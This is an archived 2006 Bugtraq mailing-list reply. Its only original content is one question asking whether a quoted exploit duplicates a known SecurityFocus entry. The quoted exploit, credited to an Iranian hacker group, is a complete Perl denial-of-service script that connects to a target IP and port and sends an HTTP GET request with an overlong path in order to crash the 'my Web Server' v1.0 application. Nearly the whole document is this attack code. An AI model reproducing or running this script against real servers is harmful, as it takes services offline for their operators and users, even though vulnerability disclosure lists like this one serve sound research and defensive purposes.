lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Fri, 26 May 2006 14:09:31 -0500
From: str0ke <str0ke@...w0rm.com>
To: "s3rv3r_hack3r@...oo.com" <s3rv3r_hack3r@...oo.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: my Web Server << v-1.0 Denial of Service Exploit


Is this the same vulnerability?
http://www.securityfocus.com/bid/5954

On 25 May 2006 13:35:13 -0000, s3rv3r_hack3r@...oo.com
<s3rv3r_hack3r@...oo.com> wrote:
> #!/usr/bin/perl
>
> #my Web Server << v-1.0 Denial of Service Exploit
>
> #vendor : Eitsop.s5.com
>
> use IO::Socket;
>
> use strict;
>
>
> my($socket) = "";
>
>
>
> if($socket = IO::Socket::INET->new(
>
>                 PeerAddr => $ARGV[0],
>
>                 PeerPort => $ARGV[1],
>
>                 Proto => "TCP"))
>
> {
>
>         print "++++++++++++++++++++++++++++++\n";
>
>         print "Connecting to $ARGV[0]:$ARGV[1] ...\n";
>
>         print "++++++++++++++++++++++++++++++\n";
>
>         print "Exploit Send successfuly!!\n";
>
>         print "++++++++++++++++++++++++++++++\n";
>
>         print $socket "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.0\r\n\r\n";
>
>         close($socket);
>
> }
>
> else
>
> {
>
>         print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
>
>         print "  ___ ___                __                         \n";
>
>         print " /   |   \_____    ____ |  | __ ___________________ \n";
>
>         print "/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / \n";
>
>         print "\    Y    // __ \\  \___|    <\  ___/|  | \//    /  \n";
>
>         print " \___|_  /(____  )\___  >__|_ \\___  >__|  /_____ \ \n";
>
>         print "       \/      \/     \/     \/    \/            \/ \n";
>
>         print "             Iran Hackerz Security Team             \n";
>
>         print "    WebSite's: www.hackerz.ir & www.h4ckerz.com     \n";
>
>         print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
>
>         print "[Usage]perl myws.pl <IP> <Port>                     \n";
>
>         print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
>
>         print "[Status]Can Not Connect To >> $ARGV[0]:$ARGV[1]     \n";
>
>         print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
>
> }
>
> #EoF
>
>
>


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ